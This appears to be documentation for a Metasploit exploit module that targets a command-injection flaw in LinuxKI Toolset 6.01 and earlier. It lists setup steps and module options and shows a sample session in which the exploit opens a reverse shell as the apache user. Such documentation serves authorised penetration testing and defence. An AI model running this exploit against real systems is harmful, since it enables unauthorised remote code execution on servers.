1.7 KiB
1.7 KiB
Description
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
Vulnerable Application
LinuxKI Toolset <= 6.01
To test this application, you need to download the version 6.01 here. Do not forget to change this URL inside the Dockerfile with this one.
Verification Steps
- Start
msfconsole use exploit/linux/http/linuxki_rceset RHOST <target_ip>set RPORT <target_port>set LHOST <your_ip>set LPORT <your_port>- Ideally run
check set LHOST <your_ip>set LPORT <your_port>- Optional:
set TARGETURI <path_to_linuxki>if target system uses a different path to LinuxKI exploit
Scenarios
LinuxKI Toolset v6.01
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
id
uid=48(apache) gid=48(apache) groups=48(apache)